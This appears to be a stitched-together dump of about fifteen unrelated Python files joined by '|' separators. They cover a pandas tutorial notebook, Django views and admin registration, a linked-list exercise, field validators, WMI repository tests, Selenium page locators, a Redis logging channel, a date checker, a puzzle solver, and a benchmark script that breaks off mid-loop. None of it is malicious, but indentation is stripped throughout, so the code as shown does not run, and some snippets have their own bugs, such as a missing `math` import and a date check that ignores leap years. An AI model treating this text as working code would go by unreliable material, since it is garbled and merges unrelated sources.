from pandas import *
import math
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
# To get the version of the pandas you are using
pd.__version__
# In[12]:
#Create Series
l_one= ['a','b','c','d','e']
s= Series(randn(5), index=l_one)
s
# In[13]:
#Check if 'b' is in s
'b' in s
# In[16]:
#Get the value of index b
s['b']
# In[17]:
#List the indexes in the series
s.index
# In[18]:
#Map series to dictionary
mapping=s.to_dict()
mapping
# In[19]:
#Convert dictionary to series
s=Series(mapping)
s
# In[20]:
#Access values by slicing
s[:3]
# In[22]:
#Convert series to string
string1=s.to_string()
string1
# In[23]:
#Get the index of the series
s.index
# In[25]:
#Map new indexes to a series
s=Series(mapping, index=['a','b','c','g','h'])
s
# In[27]:
#Check for Null values
s[isnull(s)]
# In[28]:
#Check for not null values
s[notnull(s)]
# In[32]:
#Drop the rows where at least one element is missing
s.dropna()
# In[33]:
#Arithmatic operation ( +,-,*,/)
s*2
# In[34]:
s+2
# # Data frame : 2 D collection of the series
#
# In[11]:
#Build a data frame
df=DataFrame({'a': np.random.randn(6),'b': ['hi','bye']*3,
'c': np.random.randn(6) })
df
# In[38]:
#List columns of the dataframe
df.columns
# In[39]:
#List rows of the dataframe
df.index
# In[43]:
#List values in the column a
df['a']
# In[44]:
#Add another column to the existing dataFrame
df['d']= ['whats up']*6
# In[45]:
#Print the dataFrame
df
# In[46]:
#List values after slicing indexes
df[:4]
# In[15]:
#List values based on label based indexing
df.loc[2:5,['b','c']]
# In[16]:
#List values based on position based indexing
df.iloc[2:5]
# In[17]:
#List values based on some condition
df[df['c']>0]
# In[55]:
#New DataFrame with index as date
df=DataFrame({'a': np.random.randn(6),'b': ['hi','bye']*3,
'c': np.random.randn(6)}, index = pd.date_range('1/1/2020', periods=6) )
df
# In[58]:
#Add more columns to the dataFrame
df=DataFrame({'a': np.random.randn(6),'b': ['hi','bye']*3,
'c': np.random.randn(6)},columns=['a','b','c','d'], index = pd.date_range('1/1/2020', periods=6) )
df
# In[59]:
#Check if the values are null or not
isnull(df)
# # Creation from nested Dict
# In[61]:
data={}
for col in ['hi', 'hello', 'hey']:
for row in ['a','b','c','d']:
data.setdefault(col,{})[row]=randn()
data
# In[62]:
#Convert into a dataframe
DataFrame(data)
# In[63]:
#Delete values based on [column][row]
del data['hey']['c']
# In[64]:
DataFrame(data)
# # Data Analysis
# In[3]:
#Read csv
stocks_data= pd.read_csv('/Users/priyeshkucchu/Desktop/Stocks.csv',engine='python',index_col=0,parse_dates=True)
# In[90]:
#Show data
stocks_data
# In[82]:
#Show top 5 records
stocks_data.head(5)
# In[83]:
#Show last 5 records
stocks_data.tail(5)
# In[71]:
#Show unique values in a column
stocks_data.Name.unique()
# In[84]:
#Show statistics ( mean, std, count, percentile, max, min)
stocks_data.describe()
# In[85]:
#Show column information ( count, type, null or non-null, memory usage)
stocks_data.info()
# In[86]:
#Show no of records in each column
stocks_data.count()
# In[129]:
#s1=stocks_data.Name["AAPL"][-20:]
#s2=stocks_data.Name["AAPL"][-25:-10]
#side_by_side(s1,s2)
# In[19]:
#List values based on position based indexing
df=stocks_data.iloc[1:20]
df
# In[101]:
#Sort values by a column and reset index
stocks_data.sort_values(by='close',ascending=True).reset_index().head(5)
# In[147]:
# Group by a column
stocks_data.groupby(stocks_data.Name=="AAPL").count()
# In[142]:
#Check if the values are null or non-null
stocks_data.isnull().head()
# In[165]:
# Show no of records of a column
df.Name.count()
# In[169]:
df.shape[0]
# In[9]:
#Boolean Indexing
stocks_data.loc[(stocks_data["open"]>14.0) & (stocks_data["close"]<15.0) & (stocks_data["Name"]=="AAL"),("open","close","Name")]
# In[17]:
#Apply Function
def missing_values(x):
return sum(x.isnull())
print("Missing values each column:")
print (stocks_data.apply(missing_values,axis=0))
print("\n Missing values each row:")
print (stocks_data.apply(missing_values,axis=1).head())
# In[24]:
#Imputing missing files
from scipy.stats import mode
mode(stocks_data["open"])
# In[25]:
mode(stocks_data["high"])
# In[26]:
mode(stocks_data["low"])
# In[28]:
stocks_data["open"].fillna(mode(stocks_data["open"]).mode[0],inplace=True)
stocks_data["high"].fillna(mode(stocks_data["high"]).mode[0],inplace=True)
stocks_data["low"].fillna(mode(stocks_data["low"]).mode[0],inplace=True)
# In[29]:
print("Missing values each column:")
print (stocks_data.apply(missing_values,axis=0))
# In[4]:
#Pivot Table
imput_grps= stocks_data.pivot_table(values=["volume"], index=["open","close","high"],aggfunc=np.mean)
print (imput_grps)
# In[22]:
stocks_data.hist(column="open", by="Name", bins=30, figsize=(100,100))
# In[ ]:
|
from django.views.generic.simple import direct_to_template
from django.shortcuts import render_to_response
from django.http import HttpResponse
from models import RequestItem
def request_list(request, template="main/request_list.html"):
""" Get request list and renders it. Also sorting by priority. """
req_count = 10
requests = RequestItem.objects.all().order_by("created"
).order_by("-priority")
if "priority" in request.GET and request.is_ajax():
requests = requests.order_by(request.GET["priority"])
return render_to_response("main/requests_include.html",
{"requests": requests[:req_count]})
return direct_to_template(request,
template,
{'requests': requests[:req_count]})
def ajax_request_priority(request):
"""
Get priority value for request object and change priority.
Return status either "success" or "fail".
"""
contain_valid_keys = "priority" in request.POST and "pk" in request.POST
if contain_valid_keys and request.is_ajax():
try:
pk = int(request.POST['pk'])
priority = int(request.POST['priority'])
except ValueError:
return HttpResponse("fail")
request_item = RequestItem.objects.get(pk=pk)
request_item.priority = priority
request_item.save()
return HttpResponse("success")
return HttpResponse("fail")
|
'''
@Description: 反转单链表的相关操作
@Date: 2020-04-13 23:45:50
@Author: Wong Symbol
@LastEditors: Wong Symbol
@LastEditTime: 2020-06-15 00:28:16
'''
class Node:
def __init__(self, data=None):
self.data = data
self._next = None
class LinkedList:
def __init__(self):
self._head = None
def push(self, val):
new_node = Node(val)
if self._head == None:
self._head = new_node
else:
new_node._next = self._head
self._head = new_node
# 重点体会
def iteration(self, head_node):
if head_node == None:
return head_node
# 正序遍历
# print(head_node.data)
self.iteration(head_node._next)
# 倒叙遍历
print(head_node.data)
def traverse(self, head_node, new_head):
'''
# 另外一个版本
if head_node is None:
return ;
if head_node._next is None:
new_head = head_node
else:
new_head = self.traverse(head_node._next, new_head)
head_node._next._next = head_node
head_node._next = None
return new_head
'''
global i
i = 0
if head_node._next is None:
return head_node
blank_node = self.traverse(head_node._next, new_head)
# print(blank_node)
head_node._next._next = head_node
head_node._next = None
i += 1
print('迭代:',i)
print(head_node.data)
return blank_node
def show(self):
current = self._head
while current:
print(current.data)
current = current._next
if __name__ == '__main__':
l = LinkedList()
l.push(1)
l.push(2)
l.push(3)
l.show()
print('链表的迭代访问:')
l.iteration(l._head)
print('#'*4)
exit()
new_head = None
# 以为t还是LinkedList结构,其实不然
t = l.traverse(l._head,new_head)
print('type of t:',type(t))
while t:
print(t.data,end="->")
t = t._next |
from . import ImageCaptionsDataset, RSICD, Sydney, UCM |
from django.contrib import admin
from . import models
# Register your models here.
class TodoListAdmin (admin.ModelAdmin):
list_display = ("title", "created", "due_date")
class CategoryAdmin(admin.ModelAdmin):
list_display = ("name",)
admin.site.register (models.TodoList, TodoListAdmin)
admin.site.register (models.Category, CategoryAdmin)
|
import datetime
class ValueTooShort(Exception):
def __init__(self, key, value):
self.message = 'Value {} too short. Variable --{}--'.format(value, key)
class ValueTooLong(Exception):
def __init__(self, key, value):
self.message = 'Value {} too long. Variable --{}--'.format(value, key)
class ValueContainsNumbers(Exception):
def __init__(self, key, value):
self.message = 'Value {} contains numbers. Variable --{}--'.format(value, key)
class ValueContainsIllegalSymbols(Exception):
def __init__(self, key, value):
self.message = 'Value {} contains illegal symbols. Variable --{}--'.format(value, key)
class ValueEmpty(Exception):
def __init__(self, key, value):
self.message = 'Value {} empty. Variable --{}--'.format(value, key)
class ValueContainsChars(Exception):
def __init__(self, key, value):
self.message = 'Value {} contains chars. Variable --{}--'.format(value, key)
class YearSmallerThenCompanyFounded(Exception):
def __init__(self, key, value):
self.message = 'Year {} is smaller then company founded. Variable --{}--'.format(value, key)
class FutureNotComesYet(Exception):
def __init__(self, key, value):
self.message = 'Year {} is in the Future that not comes yet. Variable --{}--'.format(value, key)
class IncorrectDepartment(Exception):
def __init__(self, key, value):
self.message = 'Value {} is incorrect department. Variable --{}--'.format(value, key)
class Employee:
year_of_founding = 2010
current_year = datetime.datetime.now().year
departments = ['Accounts', 'IT', 'Sales', 'Marketing']
def is_value_too_short(self, key, value):
if len(value) < 2:
raise ValueTooShort(key, value)
def is_value_too_long(self, key, value):
if len(value) > 30:
raise ValueTooLong(key, value)
def is_value_contains_numbers(self, key, value):
for i in str(value):
if i.isnumeric():
raise ValueContainsNumbers(key, value)
def is_value_contains_illegal_symbols(self, key, value):
for i in str(value):
if not i.isalnum():
raise ValueContainsIllegalSymbols(key, value)
def is_value_empty(self, key, value):
if not value:
raise ValueEmpty(key, value)
def is_value_contains_chars(self, key, value):
for i in str(value):
if not i.isnumeric():
raise ValueContainsChars(key, value)
def is_year_correct(self, key, value):
if value < Employee.year_of_founding:
raise YearSmallerThenCompanyFounded(key, value)
elif value > Employee.current_year:
raise FutureNotComesYet(key, value)
def is_department_correct(self, key, value):
if value not in Employee.departments:
raise IncorrectDepartment(key, value)
def check_value(self, key, value, list_of_checks):
try:
if 1 in list_of_checks:
self.is_value_empty(key, value)
if 2 in list_of_checks:
self.is_value_too_short(key, value)
if 3 in list_of_checks:
self.is_value_too_long(key, value)
if 4 in list_of_checks:
self.is_value_contains_numbers(key, value)
if 5 in list_of_checks:
self.is_value_contains_illegal_symbols(key, value)
if 6 in list_of_checks:
self.is_value_contains_chars(key, value)
if 7 in list_of_checks:
self.is_year_correct(key, value)
if 8 in list_of_checks:
self.is_department_correct(key, value)
except Exception as e:
print(e.message)
else:
return True
def __init__(self, name, surname, department, year):
if self.check_value('name', name, [1, 2, 3, 4, 5]):
self.name = name
if self.check_value('surname', surname, [1, 2, 3, 4, 5]):
self.surname = surname
if self.check_value('department', department, [1, 8]):
self.department = department
if self.check_value('year', year, [1, 5, 6, 7]):
self.year = year
#while True:
Employee('ssss', 'sssss', 'IT', None)
|
# -*- coding: utf-8 -*-
"""Tests for WMI Common Information Model (CIM) repository files."""
import os
import unittest
from dtformats import wmi_repository
from tests import test_lib
# TODO: add tests for IndexBinaryTreePage
# TODO: add tests for ObjectRecord
# TODO: add tests for ObjectsDataPage
class IndexBinaryTreeFileTest(test_lib.BaseTestCase):
"""Index binary-tree (Index.btr) file tests."""
# pylint: disable=protected-access
# TODO: add tests for _DebugPrintPageBody
# TODO: add tests for _GetPage
# TODO: add tests for _ReadPage
# TODO: add tests for _ReadPageKeyData
# TODO: add tests for _ReadPageValueData
# TODO: add tests for _ReadSubPages
# TODO: add tests for GetFirstMappedPage
# TODO: add tests for GetMappedPage
# TODO: add tests for GetRootPage
def testReadFileObject(self):
"""Tests the ReadFileObject."""
test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
self._SkipIfPathNotExists(test_file_path)
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.IndexBinaryTreeFile(
output_writer=output_writer)
test_file_path = self._GetTestFilePath(['cim', 'INDEX.BTR'])
self._SkipIfPathNotExists(test_file_path)
test_file.Open(test_file_path)
test_file.Close()
class MappingFileTest(test_lib.BaseTestCase):
"""Mappings (*.map) file tests."""
# pylint: disable=protected-access
# TODO: add tests _DebugPrintMappingTable
# TODO: add tests _DebugPrintUnknownTable
def testReadFileFooter(self):
"""Tests the _ReadFileFooter function."""
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.MappingFile(output_writer=output_writer)
test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
self._SkipIfPathNotExists(test_file_path)
with open(test_file_path, 'rb') as file_object:
file_object.seek(-4, os.SEEK_END)
test_file._ReadFileFooter(file_object)
def testReadFileHeader(self):
"""Tests the _ReadFileHeader function."""
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.MappingFile(output_writer=output_writer)
test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
self._SkipIfPathNotExists(test_file_path)
with open(test_file_path, 'rb') as file_object:
test_file._ReadFileHeader(file_object, format_version=1)
def testReadMappingTable(self):
"""Tests the _ReadMappingTable function."""
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.MappingFile(output_writer=output_writer)
test_file.format_version = 1
test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
self._SkipIfPathNotExists(test_file_path)
with open(test_file_path, 'rb') as file_object:
file_object.seek(12, os.SEEK_SET)
test_file._ReadMappingTable(file_object)
def testReadUnknownTable(self):
"""Tests the _ReadUnknownTable function."""
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.MappingFile(output_writer=output_writer)
test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
self._SkipIfPathNotExists(test_file_path)
with open(test_file_path, 'rb') as file_object:
file_object.seek(572, os.SEEK_SET)
test_file._ReadUnknownTable(file_object)
def testReadFileObject(self):
"""Tests the ReadFileObject."""
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.MappingFile(output_writer=output_writer)
test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
self._SkipIfPathNotExists(test_file_path)
test_file.Open(test_file_path)
test_file.Close()
class ObjectsDataFileTest(test_lib.BaseTestCase):
"""Index binary-tree (Index.btr) file tests."""
# TODO: add tests _GetKeyValues
# TODO: add tests _GetPage
# TODO: add tests _ReadPage
# TODO: add tests GetMappedPage
# TODO: add tests GetObjectRecordByKey
def testReadFileObject(self):
"""Tests the ReadFileObject."""
test_file_path = self._GetTestFilePath(['cim', 'OBJECTS.MAP'])
self._SkipIfPathNotExists(test_file_path)
output_writer = test_lib.TestOutputWriter()
test_file = wmi_repository.ObjectsDataFile(
output_writer=output_writer)
test_file_path = self._GetTestFilePath(['cim', 'OBJECTS.DATA'])
self._SkipIfPathNotExists(test_file_path)
test_file.Open(test_file_path)
# TODO: add tests for CIMRepository
if __name__ == '__main__':
unittest.main()
|
def summ(a,b):
print (a+b)
def subb(x,y):
print (x-y)
def mul(u,v):
print (u*v)
|
import matplotlib
import numpy
import matplotlib.pyplot as plt
def normalize(x):
'''x is a list of values'''
input_data = x[:]
N = len(input_data)
mean = float(sum(input_data))/N
variance = float(sum([i**2 for i in input_data]))/N - mean**2
return [float(i-mean)/math.sqrt(variance) for i in input_data]
def transform(samples):
'''Discrete Fourier Transform of an array'''
input_data = samples[:]
if type(input_data) != numpy.ndarray:
input_data = numpy.array(input_data)
return numpy.fft.fft(input_data)
pass
def draw(y_values, x_values=None):
'''draw a bar graph of y_values at y axis and x_values at x axis'''
graph_width = 0.05
if x_values is None:
x_values = range(len(y_values))
if len(x_values) != len(y_values):
raise Exception("Input data are not in same size")
y_values = [i.__abs__() for i in y_values]
#print y_values
p1 = plt.bar(x_values, y_values, graph_width)
plt.show()
pass
|
from selenium.webdriver.common.by import By
class MainPageLocator(object):
""" Class for user main page WebElement locators."""
####################################################
# Navigation bar #
####################################################
FLICKER_LOGO_LINK = (By.CSS_SELECTOR, 'a[href="/"]')
GET_PRO_LINK = (By.CSS_SELECTOR, 'a[data-track="gnGetProMainClick"]')
UPLOAD_LINK = (By.CSS_SELECTOR, 'a[aria-label="Upload"]')
# Navigation bar - You list
############################
YOU_LIST = (By.CSS_SELECTOR, 'li[data-context="you"]')
YOU_LINK = (By.CSS_SELECTOR, 'a[data-track="gnYouMainClick"]')
YOU = {
"YOU_ABOUT": (By.CSS_SELECTOR, 'a[data-track="gnYouAboutClick"]'),
"YOU_PHOTOSTREAM": (By.CSS_SELECTOR,
'a[data-track="gnYouPhotostreamClick"]'),
"YOU_ALBUMS": (By.CSS_SELECTOR,
'a[data-track="gnYouSetsClick"]'),
"YOU_FAVS": (By.CSS_SELECTOR,
'a[data-track="gnYouFavoritesClick"]'),
"YOU_GALLERIES": (By.CSS_SELECTOR,
'a[data-track="gnYouGalleriesClick"]'),
"YOU_GROUPS": (By.CSS_SELECTOR,
'a[data-track="gnYouGroupsClick"]'),
"YOU_CAMERA_ROLL": (By.CSS_SELECTOR,
'a[data-track="gnYouCameraRollClick"]'),
"YOU_RECENT_ACTIVITY": (By.CSS_SELECTOR,
'a[data-track="gnYouRecentActivityClick"]'),
"YOU_PEOPLE": (By.CSS_SELECTOR,
'a[data-track="gnYouPeopleClick"]'),
"YOU_ORGANIZE": (By.CSS_SELECTOR,
'a[data-track="gnYouOrganizeClick"]')
}
# Navigation bar - Explore list
###############################
EXPLORE_LIST = (By.CSS_SELECTOR, 'li[data-context="explore"]')
EXPLORE_LINK = (By.CSS_SELECTOR, 'a[data-track="gnExploreMainClick"]')
EXPLORE = {
"EXPLORE_RECENT_PHOTOS": (By.CSS_SELECTOR,
'a['
'data-track="gnExploreRecentPhotosClick"]'),
"EXPLORE_TRENDING": (By.CSS_SELECTOR,
'a[data-track="gnExploreTagsClick"]'),
"EXPLORE_EVENTS": (By.CSS_SELECTOR,
'a[data-track="gnExploreEventsClick"]'),
"EXPLORE_THE_COMMONS": (By.CSS_SELECTOR,
'a[data-track="gnExploreTheCommonsClick"]'),
"EXPLORE_FLICKR_GALLERIES": (By.CSS_SELECTOR,
'a['
'data-track="gnExploreGalleriesClick"]'),
"EXPLORE_WORLD_MAP": (By.CSS_SELECTOR,
'a[data-track="gnExploreWorldMapClick"]'),
"EXPLORE_CAMERA_FINDER": (By.CSS_SELECTOR,
'a['
'data-track="gnExploreCameraFinderClick"]'),
"EXPLORE_FLICKR_BLOG": (By.CSS_SELECTOR,
'a[data-track="gnExploreFlickrBlogClick"]')
}
# Navigation bar - Prints list
###############################
PRINTS_LIST = (By.CSS_SELECTOR, 'li[data-context="create"]')
PRINTS_LINK = (By.CSS_SELECTOR, 'a[data-track="gnCreateMainClick"]')
PRINTS = {
"PRINTS_PHOTO_BOOKS": (By.CSS_SELECTOR, 'a[href="/create"]'),
"PRINTS_WALL_ARTS": (By.CSS_SELECTOR,
'a[aria-label="Prints & Wall Art"]')
}
# Navigation bar - Notification
################################
NOTIF_MENU = (
By.XPATH,
'/html/body/div[1]/div/div[1]/div/div[3]/div/ul[2]/li[3]/div'
)
NOTIF_MENU_VIEW = (
By.XPATH,
'//div[contains(@class,"notifications-panel-view") '
'and contains(@class,"view")]'
)
# Navigation bar - Account menu
################################
ACCOUNT_MENU = (
By.XPATH,
'html/body/div[1]/div/div[1]/div/div[3]/div/ul[2]/li[4]/div'
)
ACCOUNT_MENU_VIEW = (
By.XPATH,
'//div[contains(@class,"user-account-card-view") '
'and contains(@class,"view")]'
)
####################################################
# Feed Column #
####################################################
# Filter container
################################
FILTER_BUTTON = (By.CLASS_NAME, "filter-menu-button")
FILTER_BUTTON_SPAN = (By.XPATH,
'//div[@class="filter-menu-button"]'
'/span[@class="filter-menu-text"]')
filter_droparound_menu_xpath = '//div[contains(@class,"droparound") ' \
'and contains(@class,"menu")]'
FILTER = {
"FILTER_ALL_ACTIVITY": (By.XPATH,
filter_droparound_menu_xpath +
'/div[2]/div/ul/li[1]'),
"FILTER_PEOPLE": (By.XPATH,
filter_droparound_menu_xpath +
'/div[2]/div/ul/li[2]'),
"FILTER_GROUPS": (By.XPATH,
filter_droparound_menu_xpath +
'/div[2]/div/ul/li[3]'),
"FILTER_FRIENDS_FAMILY": (By.XPATH,
filter_droparound_menu_xpath +
'/div[2]/div/ul/li[4]')
}
# Layout tabs container
################################
LAYOUT_COMPACT = (By.CSS_SELECTOR, 'a[data-layout-type="compact"]')
LAYOUT_MEDIUM = (By.CSS_SELECTOR, 'a[data-layout-type="medium"]')
LAYOUT_LARGE = (By.CSS_SELECTOR, 'a[data-layout-type="large"]')
# FEED LOAD ERROR container
################################
# FEED_LOAD_ERROR = (By.CLASS_NAME, "feed-load-error-container")
FEED_LOAD_ERROR = (By.XPATH,
'//div[contains(@class,"feed-load-error-container")]')
FEED_LOAD_ERRMSG = (By.XPATH,
'//div[@class="feed-load-error-container"]/div/h2')
# feed column content
################################
feed_column_content_xpath = '//div[@class="feed-column-content"]'
# //div[feed-column-content]/div[feed-layout] (multiple)
feed_layout_sub_xpath = '/div[@class="feed-layout"]'
feed_layout_xpath = feed_column_content_xpath + feed_layout_sub_xpath
# feed_layout_full_xpath = 'div/div'
# //div[feed-column-content]/div[feed-layout]/div[feed_item] (multiple)
feed_item_sub_xpath = '/div[@class="feed-item"]'
feed_item_xpath = feed_layout_sub_xpath + feed_item_sub_xpath
# //div[feed-column-content]/div[feed-layout]/div[feed_item]/div
# /div[photo-card layout-medium]/
photo_card_layout_sub_xpath = '/div/div'
photo_card_layout_xpath = feed_item_xpath + photo_card_layout_sub_xpath
# ---- Feed Post Header -----
# //div[feed-column-content]/div[feed_layout]/div[feed-item]/div
# /div[photo-card layout-medium]/header/div
# /div[view photo-card-header-view flickr-view-root-view]
# /div[photo-card-header ]
photo_card_header_sub_xpath = \
photo_card_layout_sub_xpath\
+ '/header/div/div/div'
# ... /div[photo-card-header ]/div[left_container]
photo_card_header_left_sub_xpath = \
photo_card_header_sub_xpath + '/div[@class="left-container"]'
# ... /div[photo-card-header ]/div[left_container]/a
photo_card_icon_sub_xpath = \
photo_card_header_left_sub_xpath + '/a'
# ... /div[photo-card-header ]/div[left_container]/
# div[attribution]/div[title_container]/a
photo_card_poster_sub_xpath = \
photo_card_header_left_sub_xpath +\
'/div/div[@class="title-container"]/a'
# ---- For Groups or compact layout photos -----
# ... /div[feed-item]/div
# /div[photo-card compact-large]/div[photo-card-content]
# /div[card-batch-layout]/div[card-batch-photo-item] (multiple)
group_batch_item_sub_xpath = \
photo_card_layout_sub_xpath\
+ '/div[@class="photo-card-content"]' \
'/div[@class="card-batch-layout"]/div'
# ... /div[card-batch-photo-item]/div/div/div[photo-card-content]
# /div[photo-card-photo]/div[photo]/a
group_photo_link_sub_xpath = '/div/div/div/div/div[@class="photo"]/a'
# ---- For Medium/Large photos ----
# ... /div[feed-item]/div
# /div[photo-card compact-large]/div[photo-card-content]
# /div[photo-card-photo]/div[photo]/a
photo_link_sub_xpath = \
photo_card_layout_xpath + \
'/div[@class="photo-card-content"/div/div/a]'
####################################################
# Info Column #
####################################################
# Slim Footer
################################
FOOTER = {
"FOOTER_ABOUT": (By.CSS_SELECTOR, 'a[data-track="footer-about"]'),
"FOOTER_JOBS": (By.CSS_SELECTOR, 'a[data-track="footer-jobs"]'),
"FOOTER_BLOG": (By.CSS_SELECTOR, 'a[data-track="footer-blog"]'),
"FOOTER_DEVELOPERS": (By.CSS_SELECTOR,
'a[data-track="footer-developers"]'),
"FOOTER_GUIDELINES": (By.CSS_SELECTOR,
'a[data-track="footer-developers"]'),
"FOOTER_HELP": (By.CSS_SELECTOR, 'a[data-track="footer-help"]'),
"FOOTER_FORUM": (By.CSS_SELECTOR, 'a[data-track="footer-forum"]'),
"FOOTER_PRIVACY": (By.CSS_SELECTOR, 'a[data-track="footer-privacy"]'),
"FOOTER_TERMS": (By.CSS_SELECTOR, 'a[data-track="footer-terms"]'),
"FOOTER_COOKIES": (By.CSS_SELECTOR, 'a[href="/help/cookies"]')
}
|
import sys
import json
import base64
from datetime import datetime
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('ascii'))
class JsonSerializationMixin(object):
""" Transforms objects mainly Entity or ValueObject to JSON """
def to_dict(self):
""" searches a get-methods in object and fires them """
field_name = lambda s: s.split('_', 1)[1] if '_' in s else s
def _parse(_field):
if _field.startswith('get_'):
field = field_name(_field)
value = getattr(self, _field)()
if hasattr(value, 'to_dict'):
value = getattr(value, 'to_dict')()
if isinstance(value, list):
value = list(map(lambda obj: obj.to_dict()
if hasattr(obj, 'to_dict') else obj,
value))
if isinstance(value, (str, bytes)) and value.isdigit():
value = int(value)
if isinstance(value, bytes):
try:
value = _b(value)
except Exception:
value = _b(base64.standard_b64encode(value))
return field, value
return dict(filter(lambda x: x, map(_parse, dir(self))))
class ValueObject(JsonSerializationMixin):
pass
class LogLevel(ValueObject):
critical = 0
error = 10
warning = 20
info = 30
debug = 100
class LogMessage(ValueObject):
""" The log message. Used mainly as a contract. """
__log_type__ = None
__object_name__ = None
__object_id__ = None
__level__ = None
__status_code__ = None
__msg__ = None
__datetime__ = None
LOG_LEVEL = LogLevel
def __init__(self, log_type=None, object_name=None, object_id=None,
level=None, status_code=None, datetime=None,
*args, **kwargs):
self.set_type(log_type)
self.set_level(level)
self.set_object_name(object_name)
self.set_object_id(object_id)
self.set_status_code(status_code)
self.set_datetime(datetime)
def set_type(self, log_type):
self.__log_type__ = log_type
def get_type(self):
return self.__log_type__
def set_object_name(self, s):
self.__object_name__ = s
def get_object_name(self):
return self.__object_name__
def set_object_id(self, s):
self.__object_id__ = s
def get_object_id(self):
return self.__object_id__
def set_level(self, level):
self.__level__ = level
def get_level(self):
return self.__level__
def set_status_code(self, status_code):
self.__status_code__ = status_code
def get_status_code(self):
return self.__status_code__
def set_datetime(self, t):
if t is None:
t = str(datetime.now())
elif isinstance(t, (int, float)):
try:
t = str(datetime.fromtimestamp(t))
except:
pass
self.__datetime__ = t
def get_datetime(self):
return self.__datetime__
@classmethod
def from_log_record(cls, record):
"""
:type record: logging.LogRecord
"""
return cls(**record.__dict__)
def __str__(self):
return '<{}: {}>'.format(self.__class__.__name__, self.get_log_type())
class AbstractChannel(object):
def send(self, message):
raise NotImplementedError()
class BaseChannel(AbstractChannel):
""" Data channel abstraction.
"""
name = 'default'
def __init__(self, name, mq=None, respond_to=None):
"""
:type mq: redis.StrictRedis
:type respond_to: Channel
"""
self.mq = mq
self.name = name
self.send_channel = respond_to
def __postproc_msg(self, fun, data):
"""
:type fun: types.FunctionType
:type data: bytes
this method trows an exceptions while processing data such as
ValueError. Don't hesitate to catch them.
"""
if isinstance(data, bytes):
data = str(data, 'utf-8')
message = fun(data)
return message
def send(self, message):
"""
:type message: dict
"""
return self.mq.publish(self.name,
self.__postproc_msg(json.dumps, message))
def __str__(self):
return '<{} queue name: {} >'.format(self.__class__.__name__,
self.name)
class Channel(BaseChannel):
""" Results Channel
"""
name = 'results'
def transform_fields(self, message):
if hasattr(message, 'to_dict'):
return message.to_dict()
return message
def send(self, message):
"""
:type message: ValueObject
"""
return super(Channel, self).send(self.transform_fields(message))
|
#I pledge my honor I have abided by the Stevens Honor System
#This program will accept a date in the format month/day/year
#It will then determine whether or not the date is valid
def main():
print("This program determines whether or not an entered date is valid.")
print("When prompted enter your date in the format month/day/year. Ex: 8/22/2014")
date = input("Enter the date you would like to validate: ")
month,day,year= date.split('/')
month = int(month)
day = int(day)
year= int(year)
date = print(month, "/", day, "/", year)
if month == 1 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 2 and day >= 1 and day <= 28 and year > 0:
print("Your date is valid.")
elif month == 3 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 4 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 5 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 6 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 7 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 8 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 9 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 10 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 11 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 12 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
else:
print("Your date is invalid.")
main() |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import pandas as pd
import mglearn
import sklearn
import scipy as sp
import sys
print("Python 버전 :{}".format(sys.version))
print("Python pandas 버전 :{}".format(pd.__version__))
print("Python matplotlib 버전 :{}".format(matplotlib.__version__))
print("Python numpy 버전 :{}".format(np.__version__))
print("Python scipy 버전 :{}".format(sp.__version__))
print("Python sklearn 버전 :{}".format(sklearn.__version__))
|
def testData():
otest = open('test.txt', 'r')
test = otest.readlines()
oanswer = open('answer.txt', 'r')
answer = oanswer.readline()
status = False
print("Runs test data")
result = runCode(test)
if result == int(answer): #not always int
status = True
print("Correct answer: " + answer + "My answer: " + str(result))
return status
def runCode(data):
print("Runs code")
patterns = [(1,1), (3,1), (5,1), (7,1), (1,2)]
total_trees = 1
for p in patterns:
position = 0
trees = 0
right = p[0]
down = p[1]
#a list of map routes
for i in range(int(down), len(data), int(down)): #start with going down, then right
line = data[i].strip()
rowlength = len(line)
position += int(right)
#Check here if pos will go outside range, if so, reset position
if (position >= rowlength):
position = position-rowlength
location = line[position]
if location == '#':
trees +=1
print(trees)
total_trees = trees * total_trees
return total_trees
#Runs testdata
testResult = testData()
if testResult == True:
print("Test data parsed. Tries to run puzzle.")
opuzzle = open('input.txt', 'r')
puzzle = opuzzle.readlines()
finalResult = runCode(puzzle)
print(finalResult)
else:
print("Test data failed. Code is not correct. Try again.")
|
import os, argparse, json, random, time
import torch
import numpy as np
def int_list(s):
return [int(x) for x in s.split(',')]
parser = argparse.ArgumentParser()
parser.add_argument('--N', type=int_list,
default=[1, 2, 4, 8, 16, 32, 64, 128])
parser.add_argument('--C', type=int_list,
default=[10, 100, 1000, 10000, 100000])
parser.add_argument('--S', type=int_list,
default=[10, 100, 1000, 10000, 100000])
parser.add_argument('--with_replacement', type=int, default=1)
parser.add_argument('--num_trials', type=int, default=5)
parser.add_argument('--stats_json', default='multinomial_stats.json')
def main(args):
replacement = args.with_replacement == 1
all_results = []
for n, N in enumerate(args.N):
print('Running N = %d (value %d / %d)' % (N, n + 1, len(args.N)))
for c, C in enumerate(args.C):
print(' Running C = %d (value %d / %d)' % (C, c + 1, len(args.C)))
